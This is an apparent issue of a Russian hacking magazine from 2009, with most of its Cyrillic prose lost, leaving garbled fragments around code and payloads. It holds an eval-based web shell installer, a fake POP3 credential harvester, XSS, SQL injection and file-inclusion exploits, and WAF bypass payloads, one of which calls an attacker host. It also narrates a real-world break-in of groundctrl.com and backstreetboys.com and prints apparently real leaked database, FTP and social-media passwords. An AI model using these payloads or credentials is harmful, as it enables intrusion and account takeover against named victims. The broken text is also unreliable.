IL-. VB Decompiler?
(EXE, DLL,
OCX), Visual Basic 5.0 6.0,
,
.NET .
p-code
, .


.
VB Decompiler

:
.
native-
, VB
Decompiler .
.NET, ,

IL-. ,

GPCh.

PEiD
peid.has.it


.

,
, .
,
,
(
).
PEiD (peid.has.it).

PE Explorer
www.heaventools.com


PE- EXE, DLL ActiveX
SCR
(Screensavers), CPL, SYS
Windows Mobile. , ,
,
, . ,
API-, . z

PE EXPLORER

VB Decompiler
www.vb-decompiler.org

, Visual
Basic,
p-code,
X 10 /130/ 09

041


CR@WLER CRAWLER@XAKEP.RU
R0ID R0ID@MAIL.RU

Easy Hack
1

:

VBULLETIN

:
,
, :).
vBulletin aka .
. :
1. ( :
?)
2.
3. ( 60 )

, , ,
, , vBulletin shell installer DeusTirael. ,
, :
$login = "admin"; //
$passw = "password"; //

-
$cookies = ""; //
$admincp = "http://blablabla.com/vbl/admincp/"; //
http-
$pltitle = "plugin"; // plugin title
$shellcode = 'eval(@$_REQUEST[c]);'; // -

P.S. vBulletin 3.5.*.

: WEP-,

:
,
, Aircrack.
AiroWizard,
- . ,
AiroWizard , ,
:). ,
:
1. , ,
2. ,
; ,
refresh; :(
3. Start Airserv-ng
Monitor Mode
4. Airodump-ng
Monitor Mode
5.
6. Airodump-ng : SSID, MAC
;
AP details and Airodump-ng

042

WEP
7. Authentication and packer replay\
injection
8. 40 WEP-
WEP crack\recovery

,
. , MAC-
:).
X 10 /130/ 09

:

-

:
- ,
, /.
-,
. Freecap.
, , 4/5 , , :).
:
1. , http://
freecap.ru
2. ,
- (,
, , , etc)
3.
4. IP-
- ( 4/5)
5.
,

6. , :)

: ORACLE


7.
IP-, ;
, -
8. ,
, :)

, , . - :).

4. (, , etc)

5. PL/SQL-

MySQL MSSQL ,
, . Oracle ,
:).

.
? ORACLE
SECURITY TOOLS,
.
Oracle
, .
:
Oracle
Oracle
PL/SQL
Windows 2000/XP/2003
(
)

Oracle, :
1. ,
(http://securetools.ru)
2.
3.
X 10 /130/ 09

043

:
,
. , ,
, 3 . -, ( , ).
, . ,
Openpass, Passview Recover .
.
1. Fake-POP3, .
#!/usr/bin/perl

$stat=$client->recv($data,1024);
$client->send("+OK Password?\n");
$stat=$client->recv($data,1024); #
RFC1939
(undef,$data)=split('',$data);
print "Password is \"$data\"\n; #

close($client); #
exit;
}
}

2. (
, ).
3.
. plain-text,
. .
, (, FTP). .

# Emulate the fake pop3 service ;)


use IO::Socket;
$|++; #
fake-pop3
$sock=IO::Socket::INET->ne
w(Listen=>10,LocalPort=>1
10,Proto=>'tcp',Reuse=>1)
|| "Cant open port: $!\n";
# 110

while($client=$sock>accept()) {
while(1) { #

$client->send("+OK Fake POP


Service ready\n"); #

: -

5. start

, , :).
- :)

,
:). , ,
R&D P Brute v2.0, , .
Windows- RDP. , :



IP-

10 . ,
:
1.
2.
3. ips.txt IP- ,
pass.txt
4.

044

X 10 /130/ 09

:
OLLYDBG

:
1.
TLS-callback . MSDN:
. TLS callback-, TLS-,
,
. , .
,
Hello, World ( DVD).
TLS- . ,
PE- OllyDbg, 16 , ( ),
Binary Edit : 00
11 40 00 10 11 40 00 4D 10 40 00 36 10 40 00 (
). 00401100 00401110
. 0040104D
- ( ,
). , 00401036 callback-.
2. callback-.
00401036, 6 , Binary
Edit. 40 10 40 00 00 00. 4
callback-.
callback-.

:
RDTSC (
- )

:
1. Kernel-Mode Driver Manager,
Four-F.
2 . http://www.wasm.ru
fakerdtsc.sys c ( RDTSC

X 10 /130/ 09

3. 00401040.
; ,
API- MessageBoxA PUSH 0.
, 00401000. PUSH 1 (
, Hello, World, ,
, Ok ) callback-:
00401040 MOV EAX,00401000; EAX
00401045 MOV EBX,0068016A; , 0068006A
0040104A MOV DWORD PTR DS:[EAX],EBX;
0040104C RETN;

( Copy to executable All modifications


).
4. TLS- PE-
. 00400000, Special
PE Header, PE-. , PE.
TLS Table address <Ctrl+E> . ,
, 00401026. , PE-
, , 00401026
ImageBase (00400000) 00001026. ,
26 10 00 00.
Copy to executable File;
Save file. .
, Ok ,
.


). RDTSC ,
, RDTSC, .
3. fakerdtsc.sys Kernel-Mode Driver
Manager
Register Run.
4. , RDTSC.
5. (Stop, Unregister).z

callback-

045


ICQ 884888, HTTP://WAP-CHAT.RU

, : XSS, CSRF, -
( ), .
SQL-, , , , LOCAL/REMOTE FILE
INCLUSION .., . ,
.
, CMS BITRIX

XSS XOOPS

01

RSS ATOM OPERA


GOOGLE CHROME

BRIEF 2006 James Holderness James M.


Snell ,
XSS- - (, Feed
Demon).
, 15 Inferno

Google Chrome Opera
(full disclosure Inferno : http://securethoughts.
com/2009/09/exploiting-chrome-and-operas-inbuilt-atomrss-readerwith-script-execution-and-more).
EXPLOIT ,
:
1.
rss/atom , evil- (
Google Chrome Opera
);
2. .
Profit : ( Google Reader, My.Opera.
com -),
(
http://jeremiahgrossman.blogspot.com/2006/08/iknow-where-youve-been.html ),
javascript ( http://
jeremiahgrossman.blogspot.com/2006/11/browser-port-scanningwithout.html ). ,
:

046

1. Google Chrome (18 XSS) http://securethoughts.com/


security/rssatomxss/googlechromexss.atom;
2. Opera (38 XSS) http://securethoughts.com/security/
rssatomxss/opera10xss.atom.
:
1. -
( javascript
, ftp-
);
2.
(html, jsp, php, htaccess ..);
3. .rss .atom (
, .rss/.atom, .atom.
tx, - ,
application/{atom/rss}+xml);
4. ;
5. :).
:
1. Opera http://securethoughts.com/security/rssatomxss/opera10xss.
atom.tx;
2. Chrome http://securethoughts.com/security/rssatomxss/
googlechromexss.atom.tx.
,
Internet Explorer ( , 8 )
html+javascript (
mime type ).
IE. Internet Explorer http://securethoughts.com/security/
rssatomxss/anyfile.tx javascript-
:
X 10 /130/ 09

XSS

XOOPS ADVISORY

<html>
<script>alert('XSS')</script>
</html>

,
Inferno :(.

TARGETS Opera 10 .
Google Chrome < v3.0.195.21.
SOLUTION Google
Chrome (v3.0.195.21
), Opera , js
, .

02

MOZILLA FIREFOX

BRIEF ,
. Jeremy Brown (http://jbrownsec.blogspot.com) , Firefox
.
Linux-. ,
, ,
Downloads,
/tmp.
/tmp
.
EXPLOIT
, X 10 /130/ 09

: I will be releasing exploit code as soon as updates fixing the issue


are provided.
, Jeremy Brown'
. ,
,
. :
http://securitytube.net/Zero-Day-Demos-(Firefox-VulnerabilityDiscovered)-video.aspx (
YouTube).

TARGETS Mozilla Firefox 2.x 3.x.


SOLUTION .
.

03

XOOPS

BRIEF XSS,
. cross site scripting
php-, XOOPS. ./
xoops233/modules/pm/viewpmsg.php. $_REQUEST['op']:
<?php
...
$_REQUEST['op'] = empty($_REQUEST['op']) ? "in" : $_
REQUEST['op'];
...
$pmform->addElement(new XoopsFormHidden('op', $_
REQUEST['op']));

047

XSS OPERA


FIREFOX


WAP-MOTOR

$pmform->assign($xoopsTpl);
?>
, $_REQUEST['op'] - hidden- , ,
$_REQUEST ,
- .

EXPLOIT ( Sense of Security)


PoC-:
http://site.com/xoops-2.3.3/htdocs/modules/pm/
viewpmsg.php?op='"><script>alert('vulnerable')</
script><link id='

: http://www.
senseofsecurity.com.au/advisories/SOS-09-005.pdf.

TARGETS XOOPS <= 2.3.3.


SOLUTIONS
www.xoops.org (
2.3.3b).

03

RUBY ON RAILS

BRIEF: XSS ,
Ruby on Rails , , Twitter.com.
-
BIG5, EUC-JP, EUC-KR, GB2312
SHIFT_JIS (,
SQL- web-).

javascript . - -

FormHelper- .

048

(, , , ..).
, -,
, , ,
.

EXPLOIT XSS
, :
<a href="http://site.com" title="XSS [-, 2 ]">ABCD"
onerror='alert(131)'>131</a>

title
0131 (ALT + 0131),
( )
> :
<a href="http://site.com" title="XSS [ 4- ]>ABCD" onerror='alert(143)'>143</a>

, , , GB2313 0131 ( )
,
0131 + = .
http://www.criticalsecurity.net/index.php/
topic/31640-xss-via-multibyte-characters.

TARGETS 2.0.0 .
SOLUTION , .
Ruby on Rails 2.3.4, 2.2.3,
rubyonrails.org.

04

BITRIX CMS

BRIEF: 1C Bitrix CMS ( , , -, securitylab.


X 10 /130/ 09


MOZILLA FIREFOX

XSS GOOGLE CHROME

ru,
) cross
site scripting . , Chaos Constructions
2009, (http://onsec.ru).
- http- Referer,
<a> .
,
, .
-
WAF ( ).
XSS-.
(,
..).

>> EXPLOIT
Referer:
Referer: " style="onsec:e&#92xp&#92re&#92s&#92s&#92i&#
92o&#92n(alert(111))

WAF 1-.
security- 40
:
<style>
@\69\6D\70\6F\72\74 url(http://onsec.ru/xss.css);
</style>
--e&#92xp&#92re&#92s&#92s&#92i&#92o&#92n

WAF
SQL-,
Includes, XSS. - :).

TARGETS Bitrix CMS <= 8.0.5.


SOLUTION
X 10 /130/ 09

.
.

05

WAP-MOTOR

BRIEF: - WAP- z .
. ,
CMS Wap-motor, Wap- ,
.
Inj3ct0r' (Inj3ct0r.com).
1. ./gallery/gallery.php:
<?php
require_once"../template/start.php";
require_once"../template/regglobals.php";
require_once"../template/config.php";
require_once"../template/functions.php";
$image=check($image);
$ext = strtolower(substr($image, strrpos($image, '.')
+ 1));
if($ext=="jpg" || $ext=="gif" || $ext=="png"){
if($ext=="jpg"){$ext="jpeg";}
$filename = BASEDIR."local/datagallery/$image";
$filename = file_get_contents($filename);
header('Content-Disposition: inline;
filename="'.$image.'"');
header("Content-type: image/$ext");
header("Content-Length: ".strlen($filename));
echo $filename;
}
?>

2. ./template/regglobals.php:

049


XSS TWITTER

UNICODE

<?php
...
if (!ini_get('register_globals')) {
while(list($key,$value)=each($_GET))
$GLOBALS[$key]=$value;
while(list($key,$value)=each($_POST))
$GLOBALS[$key]=$value;
while(list($key,$value)=each($_SESSION))
$GLOBALS[$key]=$value;
}
...
foreach ($_GET as $check_url) {
if ((eregi("<[^>]*script*\"?[^>]*>", $check_url))
|| (eregi("<[^>]*object*\"?[^>]*>", $check_url)) ||
(eregi("<[^>]*iframe*\"?[^>]*>", $check_url))
|| (eregi("<[^>]*applet*\"?[^>]*>", $check_url)) ||
(eregi("<[^>]*meta*\"?[^>]*>", $check_url)) ||
(eregi("<[^>]*style*\"?[^>]*>", $check_url)) ||
(eregi("<[^>]*form*\"?[^>]*>", $check_url)) ||
(eregi("\([^>]*\"?[^)]*\)", $check_url)) ||
(eregi("\"", $check_url)) || (eregi("\'",
$check_url)) || (eregi("\./", $check_url)) ||
(eregi("//", $check_url)) || (eregi("<",
$check_url)) || (eregi(">", $check_url))) {
header ("Location: ".BASEDIR."index.php?isset=403&".
SID); exit;
}
...
?>

, $_GET['image']:

050
50

1. $_GET['image'] $image:
while(list($key, $value) = each($_GET)) $GLOBALS[$key] =
$value;

2. $image $check_url eregi-


;
3.
;
4. .

>> EXPLOIT , directory traversal, ,


ereg[i]-, -.
, :
1. :
http://wap.site.com/gallery/gallery.php?image=%00../
datatmp/adminlist.dat%00.gif

2. credentials :
http://wap.site.com/gallery/gallery.php?image=%00../
profil/[MY_ADMIN_NAME].prof%00.gif

3. .
, -
magic_quotes.
TARGETS Wap-Motor <= 18.0.
SOLUTION
http://visavi.net/wap-motor. z
X 10 /130/ 09


ICQ 884888, HTTP://WAP-CHAT.RU

BACKSTREET'S
BACK!

BACKSTREET BOYS
,
backstreetboys.com, myspace.com/
backstreetboys, twitter.com/backstreetboys
. , , Everybody.
WHO IS WHO
, , http://backstreetboys.com.
flash
Coming soon. : Tour Dates, Enter
Fanclub, Shop BSB, BSBlog. Tour Dates Enter
Fanclub
http://fanclub.backstreetboys.com. Shop BSB
http://backstreetboys.
shop.bravadousa.com, BSBlog, -

052

, http://blog.backstreetboys.com.
, ,

WordPress :). , ,
(2.7.1) ,
.
,
.
http://admin.backstreetboys.com,
http-, .


fanclub.backstreetboys.com.

!

,
(
2007 , ). ,

.

X 10 /130/ 09

. ,
.
: Home (), Tour ( ) Discography
().
(
mod_rewrite,
http://fanclub.backstreetboys.
com/events/827#signups),
, ,


.
:
2009 Backstreet Boys. All rights
reserved.
Powered by ground(ctrl).

,
ground(ctrl), http://groundctrl.com.


, ground(ctrl) , cms
.
: We offer innovative interactive
marketing and merchandising services for Music
Stars, Athletes, and Personalities.
( Backstreet Boys) , : Daughtry,
Papa Roach, Paul Oakenfold, Thalia, Far, New
Kids on the Block, Third Eye Blind, Dredg, Gavin
Rossdale.

GROUNDCTRL.COM

BSBADMIN.COM


X 10 /130/ 09

GROUND(CTRL) ,

CMS .
backstreetboys.com,
groundctrl.com :).
cms

,

http://groundctrl.com/admin.

, http-,
/ -.
, -

-. ,
Username Password
1' sql:
SELECT * FROM users WHERE user_name
= '1'' AND password = MD5('1\'')

, - :).

: - 1' or 1=1/*.
, , ,
. - ,
:)
,
. Manage Users,

jennie. ,
, , jpg, gif and
png images minimum size 265 x 213.
, , ,
php- .
-
evil- http://
groundctrl.com/media/images/404.php.

.

groundctrl.com
pop-
, -
groundctrl.com.
, , http://mail.
groundctrl.com https://www.google.com/a/
groundctrl.com/ServiceLogin.
, -

Gmail.

cms. ,
- groundctrl.com,
MySQL,
. /var/www/vhosts/groundctrl.
com/httpdocs/admin/con/mysql_connect.php:
<?php
define ('DB_USER', 'groundctrl');
define ('DB_PASSWORD',
'breakhouse');
define ('DB_HOST', 'localhost');
define ('DB_NAME', 'groundctrl_
website');
$dbc = @mysql_connect (DB_HOST,
DB_USER, DB_PASSWORD) or die ('Could
not connect to MySQL: ' . mysql_
error());
mysql_select_db (DB_NAME);
?>



sql- .

PHP-eval :
include 'mysql_connect.php';
$query = mysql_query('select * from
users');
while($arr = mysql_fetch_
array($query))
{
print_r($arr);
}


.
matt.sergent@groundctrl.com md5 330ef80613513b8286f95042bf372
362, irc
plain-text.info:
M4g
.c3p0 addmd5 330ef80613513b82
86f95042bf372362
C3P0 M4g: add ok... at 02:51:33
C3P0 MD5 Hash:330ef80613513b8
286f95042bf372362 passwd:paplee
hex:7061706c6565


https://www.google.com/a/groundctrl.com
ServiceLogin matt.sergent

053

( Plesk, root- mysql ftp/


sftp- ),
:).
, -, !

.

BACKSTREETBOYS.COM

:)

HTTP://WWW
links

backstreetboys.com
.
groundctrl.com


.
http://ru.wikipedia.
org/wiki/Backstreet_
Boys
Backstreet Boys
.
myspace.com/
backstreetboys

MySpace.
twitter.com/
backstreetboys

.

054

paplee, .

,
. : ftp pass, ftp password,
password login. :
https://twitter.com/backstreetboys
username backstreetboys
password j3nnj3nn
--Myspace.Com
bsbsocialutility@yahoo.com
spring99
--Bsbadmin.com ( admin.backstreetboys.com)
Bsboys
.sandoz.
--FTP
host: backstreetboys.com
user: backstreetsback
pass: 3rxvt6pueuyr
--FTP
host: groundctrl.com
user: groundctrl
pass: ninegbzif3zfgw

,

.
I'll be watching you! From Russia
with love :) ( ).
:
piiittta@backstreetboys what...i dont
understand?????
--NinaBackstreetRT @kairarosa @backstreetboys
Oh Guys!!!!!!!! Hello!!!! Russia????? OMG!
Around the world again????? LOL! Love you! Say
Hi to Brazil!
--Loliii@backstreetboys I'll be watching YOU
with love from Argentina, how about that uh?
--realNinoRodgers@backstreetboys I'll be
watching you! From Russia with love :) <<
That's my country, HAVE FUN!! :-)
--MysticalPixie@backstreetboys who will be
watching? gotta tell us who is twitting here
guys...lol
--puricha@backstreetboys What? Are you in Russia
now? I thought you were in Madrid !!
--DannynhaMansani@backstreetboys Are u going to
Russia? Is Russia your next stop, guys? WOW!
U're traveling a lot, hope u're having some fun
=)
--overloved@backstreetboys oooohhh my boys!!!
tell me something, i wanna know if u do feeling
excited to come to Dubai?? how u feel? :D
--m_serra@backstreetboys i'm watching you! from
brazil with love :)
--k_rina_ktbspa@backstreetboys COME BACK TO
SOUTHAMERICA.. CHILE MISS YOU!!! BESOS!!! SA
FANS.. LOVES YOU!!!! PLEASE!! :-(
--vale101@backstreetboys heeey what?s new.. are
in Russia .. Wow, understand the language ..
tell me something in Russian?... jejeje kisses
--MayMclean@backstreetboys Hey guys... what's
up?? Russia... this is great!! OMG!! tell us
when TIU TOUR will arrive in Brazil?!
--danyzinhalee_@backstreetboys Russia, madrid,
Holland, Germany, u guys travel a lot
X 10 /130/ 09

INFO

info


GROUND(CTRL)

BSB MYSPACE

beijinho doce to you


--pancho_torto@backstreetboys realyy!!?? people
said that it's a great placee!!! please come
back to Argentinaa!!! We love you guys!!

, ,
, ,
,
:).
MySpace. ,
BSB .
Backstreet Boys:
Maira Carter:
BACKSTREET BOYS FOREVER <3
PLEASE, COME TO BRAZIL.
I LOVE YOU SO MUCH....
--Suzan:
And who will that 'I' be ????? ;) Mr Littrell?

SQL-
GROUNDCTRL.COM

X 10 /130/ 09

BSB MYSPACE

Mr Mclean? Mr Carter? Mr Dorough???? ;)


Cause I'll be watching too... From Holland with
Love! ;)
--GinCarter:
WOW GUYS! GOOD LUCK!
--[*ALMA DaNgErOuS*]:
who's gonna be watching???
xD
remember, Mexico loves you, you have to come
back! :)
---Rawan-:
I don't know WHO will be watching us..:p but i
have a feeling that Nick is the one who will be
watching us!
--*JULIE*ORR*:
oh never mind then lol
--Danny_Mansani:
I don't know who will be watching us, but I'm
def will be watching u ;)
From Brazil, with love =)
--Stephanie:
What?

MySpace
, ,
.

.

, , .
, ,

. ,
, : ,
,
!
P.S.
.
:).z

Backstreet Boys (.
)
,
20
1993
(). 2001 .



.
Backstreet Boys


,
,


.

:
,
,
, .



23 2006 .

WARNING

info



.


. ,



,

.

055


RAZ0R HTTP://RAZ0R.NAME

Web Application Firewall

-:
, . , , ,
,
. , -
?

-
.

:
-.
,
, , ,

. ,
,

056

, .
: .
(

Microsoft' Security Development
Lifecycle). !
,

-
Web Application Firewall (WAF).

,
,
WAF.
, Web Application Firewall
,
, , HTTP-.
,
, ,
. WAF ,
X 10 /130/ 09

, .
Web Application Firewall
, ,
, , -,
. , , WAF
.
,
open source.

WAF?

Web Application Firewall


. WAF -:
, ,
. WAF
.
:
1. ;
2. /
;
3. -.
,
mod_security (modsecurity.org), Barracuda
(barracudanetworks.com), nevisProxy
(adnovum.ch). WAF
-,

-
.
WAF, , Impreva
SecureSphere (impervaguard.com).

,
.
, , -
, WAF.
WAF
CMS (www.1c-bitrix.ru). WAF, blacklist (

) whitelist ( ),
. ,
: UNION SELECT,
<script>, /etc/passwd;

( 0 65535).
WAF
,
,
WAF,
, . .

WAF
. WAF , ,
, ? .
, ,
(
fingerprint), , WAF .
:

Cookie HTTP-;

HTTP-, , Server;
;

;
, .
, mod_security
501; WebKnight
999; Barracuda cookie- barra_
counter_session.
,
WAF
. , ,
.
WAF_fingerprint
w3af wafw00f.
.

WAF

. WAF.
,

.
,

.
,
whitelist ,

-

. ,
mod_security Remo,

.

. WAF

-,

.
Profense
Web Application Firewall, XSS :
1. http://example.com/xss.
php?var=<script>alert(document.cookie)</
script ByPass>
2. http://example.com/xss.
php?var=<script>alert(document.cookie)</
script>=%0AByPass
(cve.mitre.org/cgi-bin/
cvename.cgi?name=CVE-2009-1593) , : WAF XSS,
, ;
JS-,
.
(cve.mitre.org/cgi-bin/
cvename.cgi?name=CVE-2009-1594) XSS
,
, ,

,
.
,
WAF .
,
WAF.

HTTP PARAMETER
POLLUTION

HPP

WAFW00F

WAF


,
X 10 /130/ 09

057

MD5-

INFO

info

h4ck1nb3rg


Web Application
Firewall.



www.h4ck1nb3rg.
at/wafs/final_project_
documentation_
v1.1.pdf.

(Luca Carettoni)
(Stefano di Paola). HPP HTTP (POST, GET) ,
, (query string).
,
WAF.
IIS+mod_
security, SQL-, WAF. :
1. IIS HTTP-,
. :
POST /index.aspx?a=1&a=2 HTTP/1.0
Host: localhost
Cookie: a=5;a=6
Content-type: text/plain
Content-Length: 7
Connection: close
a=3&a=4

IIS/ASP.NET a
(Request.Params["a"]) 1,2,3,4,5,6.
2. mod_security ,
-,

.
SQL-, ,
mod_security: http://localhost/
index.aspx?id=-1+UNION+SELECT+username,passw
ord+FROM+users.
HPP
:
POST /index.aspx?a=-1%20union/*&a=*/select/*
HTTP/1.0
Host: localhost
Cookie: a=*/from/*;a=*/users
Content?Length: 21
a=*/name&a=password/*

IIS a, mod_security
.
:
SELECT b,c FROM t WHERE a=-1/*,*/UNION/*,*/
SELECT/*,*/username,password/*,*/FROM/*,*/
users

058

SQL-

SQL-
, , ,
:
mysql_query("SELECT c,d FROM t WHERE a= " .
$_GET["a"] . " AND b=" . $_GET["b"]);

, WAF SQLi- , ,
:
/?a=-1+UNION/*&b=*/SELECT 1,version()

SQL- :
SELECT c,d FROM t WHERE a=-1 UNION/* AND
b=*/SELECT 1,version()

SQL-. -
. -,

INSERT UPDATE, SELECT. -, addslashes(),
. , ,
-
WAF. , ,
SQL-. , Danneo CMS 0.5.2.
CMS , WAF. ,
, ; :
foreach($_REQUEST as $params => $inputdata)
{
foreach($baddata as $badkey => $badvalue)
{ if(is_string($inputdata) &&
eregi($badvalue,$inputdata))
{ $badcount=1; }
}
}

,

X 10 /130/ 09

DVD
dvd

, ,
,

WAF
.

XSS GOOGLE CHROME

- eregi(), %00.
PHP magic_quotes_gpc
- ,
:
if(!ini_get("register_globals") ||
(@get_cfg_var('register_globals')==1)) {
@extract($_COOKIE,EXTR_SKIP);
@extract($_POST,EXTR_SKIP);
@extract($_GET,EXTR_SKIP);
@extract($_REQUEST,EXTR_SKIP);
/* ... */
if(get_magic_quotes_gpc()) {
if($_POST) $_POST = stripslashesall($_
POST);
if($_GET) $_GET = stripslashesall($_GET);
if($_REQUEST) $_REQUEST =
stripslashesall($_REQUEST);
if($_COOKIE) $_COOKIE =
stripslashesall($_COOKIE);
}

, ,
($_GET,
$_POST, $_COOKIE, $_REQUEST),
, ,

extract(), .
.
SQL-
:
$comtext=($setting['peditor']=="yes") ?
commentparse($comtext) :
deltags(commentparse($comtext));
$comname = (preparse($usermain['logged'],T
HIS_INT)==1 && preparse($usermain['userid'
],THIS_INT)>0) ? $usermain['uname'] : subs
tr(deltags($comname),0,50);
$comtitle=substr(deltags($comtitle),0,255);
$in=$db->query("INSERT INTO "
.$basepref."_polling_comment VALUES
(NULL,'".$id."','".$usermain
['userid']."','".NEWTIME."', '$comname',
'$comtitle','$comtext','".REMOTE_
ADDRS."')");

, X 10 /130/ 09

comtitle substr() 255


. ,
, .

SQL-,
magic_quotes_gpc=on.
:
comname a-z 5 10;
comtitle 254 + ;
comtext /*%00*/, (SELECT adpwd FROM dn052_admin
LIMIT 1), 1)-- comtitle
,
, comtext. , SQL-:
INSERT INTO dn052_polling_comment VALUES
(NULL,'1','0','1230987393',
'antichat','a[252x]b\','/*\0*/, (SELECT
adpwd FROM dn052_admin LIMIT 1), 1)--','127.0.0.1')

SQL-

Danneo CMS
DVD.

HTTP://WWW
links
www.webappsec.
org Web Application
Security Consortium
(WASC).
ru.wikipedia.org/
wiki/__OSI.
xiom.com ,
WAF.
code.google.com/p/
waffit
wafw00f.
w3af.sourceforge.net
w3af.
www.netnea.com/
cms/?q=remo GUI
Remo.

SQL- WAF
.
. , MySQL
:

, ,
RDBS.

059

XSS

Cross site scripting , ,



WAF.
JavaScript
HTML.

BlackHat XSS WAF. ,
. :
<object
data="javascript:alert(0)">
<isindex
action=javascript:alert(1)
type=image>
<img src=x:alert(alt)
onerror=eval(src) alt=0>
<x:script xmlns:x="http://www.
w3.org/1999/xhtml">alert('xss');</
x:script>

:
($=[$=[]][(__=!$+$)[_=-~-~~$]+({}+$)[_/_]+($$=($_=!''+$)
[_/_]+$_[+$])])()[__[_/_]+__
[_+~$]+$_[_]+$$](_/_)

, ?
, alert(1); http://
oxod.ru/?p=290.
, JS-
HTTP- refresh location (http://
websecurity.com.ua/3386).

WAF:
/?param=data:text/html;base64,PHNj
cmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
alert(1), base64,
Opera, Safari
Chrome,
URL
refresh:
...
Refresh 0; URL = data:text/html;b
ase64,PHNjcmlwdD5hbGVydCgxKTwvc2N
yaXB0Pg==
...

060

WAF XSS
,
,
:
http://ha.ckers.org/xss.html
XSS Cheat Sheet; ,
RSnake
;
http://sla.ckers.org/forum/list.php?24

-;
http://maliciousmarkup.blogspot.com
JS-; , .

PATH TRAVERSAL/LFI/RFI


-,
WAF.
,
.
sla.ckers.org

USH.
/ .

, Suhosin patch . , :
<?php
include("includes/" . $_
GET["inc"]. ".php");
?>

WAF %00 inc,



:
/?inc=../.htpasswd////...4096...
///


: raz0r.name/articles/null-bytealternative.
Remote File Include (RFI),

WAF:
/?inc=http://attacker/s.txt?


MOD_SECURITY REMO

PHP:
- FTP:
/?inc=ftp://attacker/s.txt

file_exists() true.
- POST-
( allow_url_include=on):
POST /?inc=php://input HTTP/1.0
Host: localhost
Content-type: text/plain
Content-Length: 10
Connection: close
phpinfo();

- data (allow_url_
include=on):
/?inc=data:;base64,PD9waHAgc3lzdGV
tKCRfR0VUW2NdKTsgPz4=&c=dir

- compress.
zlib://, php://filter, ogg://
.

Web Application Firewall .



.
PHP WAF ,
. , - -,
, ,
WAF,
. , .z
X 10 /130/ 09


D0ZNP HTTP://OXOD.RU

FIREWALL
XSS.

XSS
1000 1 XSS-
! , z, . , ,
.
! , ,
, ha.ckers.org/xss.html.
29 , 12:00,
Chaos Construction
2009 Realtime Bitrix WAF
Hack. 1-
Possitive Technologies.
WebApplicationFirewall. ,
(http- GPC)
SQL-injection, XSS, LFI RFI.

062


.
, WAF.
XSS ,
Hack-Video XSS- Referer
8.0.5. ><script> onMouse*
,
.

, 30 . ,
:
<style>
@\69\6D\70\6F\72\74 url(http://
onsec.ru/xss.css);
</style>
style=onsec:e&#92xp&#92re&#92s&#92
s&#92i&#92o&#92n(alert(XSS))
X 10 /130/ 09

onEnd="alert('ONSEC.ru russian
security team')">

HTML-
XSS C
BLACKHAT 2009
IE 7. ,
XSS IE8.
,
.
,
.
, .

7 , 01:00,

HTC- , ,
-
WAF ( 40
, ).
, style , .
escape- ,
&#92.

behavior IE,
09 :
<P STYLE="b&#92eh&#92a&#92v&#92i&
#92o&#92r:url('#default#time2')"

MSDN .

EVENT

- JJ-ENCODE
JAVASCRIPT :)
X 10 /130/ 09

,
.
XSS:
<MARQUEE BEHAVIOR="alternate"
onbounce="alert('ONSEC.ru')">xss
</MARQUEE>

<MARQUEE onstart="alert('ONSEC.
ru')">xss</MARQUEE>

behavior IE8,
FF 3.5.
.
XSS , .

(Events),
JavaScript-
<script>. , :
<a href="" onMouseMove="alert(1)">
<a href="" onMouseMove=javascript:
alert(1)">
<a href="
onMouseMove="xakep:alert(1)">
<a href=""
onMouseMove="nonxss:alert(1)">

IE 8, Opera 10.00, Firefox


3.5, Safari, Chrome. ,

? ,
.
:
1. -, -
.
2.
on,
.
3. .


. , ,
, .

, -
MSDN,

-, . ?
,
, ,
,
.
, :
Onabort; onactivate;
onafterprint; onafterupdate;
onbeforeactivate; onbeforecopy;
onbeforecut; onbeforedeactivate;
onbeforeeditfocus; onbeforepaste;
onbeforeprint; onbeforeunload;
onbeforeupdate; onblur; onbounce;
oncellchange; onchange;
onclick; oncontextmenu;
oncontrolselect; oncopy; oncut;
ondataavailable; ondatasetchanged;
ondatasetcomplete; ondblclick;
ondeactivate; ondrag; ondragdrop;
ondragend; ondragenter;
ondragleave; ondragover;
ondragstart; ondrop; onerror;
onerrorupdate; onfilterchange;
onfinish; onfocus;
onfocusin; onfocusout;
onhashchange; onhelp;
onkeydown; onkeypress; onkeyup;
onlayoutcomplete; onload;
onlosecapture; onmessage;
onmousedown; onmouseenter;
onmousemove; onmouseout;
onmouseover; onmouseup; onmove;
onmoveend; onmovestart;
onoffline; ononline;
onpage; onpaste; onprogress;
onpropertychange;
onreadystatechange; onreset;
onresize; onresizeend;
onresizestart; onrowenter;
onrowexit; onrowsdelete;
onrowsinserted; onscroll; onselect;
onselectionchange; onselectstart;
onstart; onstop;
onstorage; onstoragecommit;
onsubmit; ontimeerror; ontimeout;
onunload;
onend; onMediaComplete;
onMediaError; onOutOfSync; onPause;
onRepeat;
onResume; onReverse; onSeek;
onSynchRestored; onTrackChange;
onURLFlip.

, ?
, , -

063



XSS-,

.

WARNING

info
!

! ,

!

HTTP://WWW
links
oxod.ru
.
. ,
.
utf-8.jp/public/
jjencode.html
JavaScript.
p42.us/favxss/fav.
ppt
XSS filters bypass
BlackHat 2009.
disenchant.ch/
blog/wp-content/
uploads/2008/05/
xss_presentation.pdf
,

XSS.
slideshare.net/
guestdb261a/
csrfrsa2008
jeremiah
grossman349028


CSRF.

CLICKJACKING
;).
XSS-. , -,
, -,

. XSS-
. :
codebase
dynsrc
lowsrc
xmlns
seekSegmentTime
src
style

, ,
,
,
.

,
<>, , .
. , :
Style
Script
Embed
Object
Applet
Meta
Iframe
Frame
Frameset
Ilayer
Layer
Bgsound
Base
Xml
Import
Link
Html
Img

<MARQUEE>,
.

064

HTML. <ilayer>,
, ,
. :
XSS
.
XSS-, ,
. www.
browsertests.org, .

CSRF, JAVASCRIPT

JavaScript ( VBScript)
,
. Cross-Site Request Forgery. <img src=http://megasite.ru/
mygetrequest?mygetparam=value>.
HTML- ,
HTTP GET . , , ,
,
, GET.
,
(, IP-).

. .
http-, 3 .
img.php ( img.gif, ) :
<?php
header('Location: http://attacked-host/
admin.php?act=delUser&id=1');
die();
?>

. ,
,
. ,
, LibGD.
. , - . . JavaScript
DOM-, ,
. , , POST-.
document.write form, input
- div,
document.myform.submit(). POST window.ActiveXObject
Internet Explorer window.XMLHttpRequest Mozilla,
X 10 /130/ 09

HA.CKERS.ORG XSS.

Safari, Chrome. JavaScript
:
function makePOSTRequest
(url, parameters)

XSS
WAF,
CHAOS CONSTRUCTIONS 2009
, .
:

{
http_request = false;
// Mozilla, Safari,...

<img src='myprinter:9100/Printed_
from_the_web/>

if (window.XMLHttpRequest)
{
http_request = new XMLHttpRequest();
if(http_request.overrideMimeType)
{
// set type accordingly to anticipated
content type
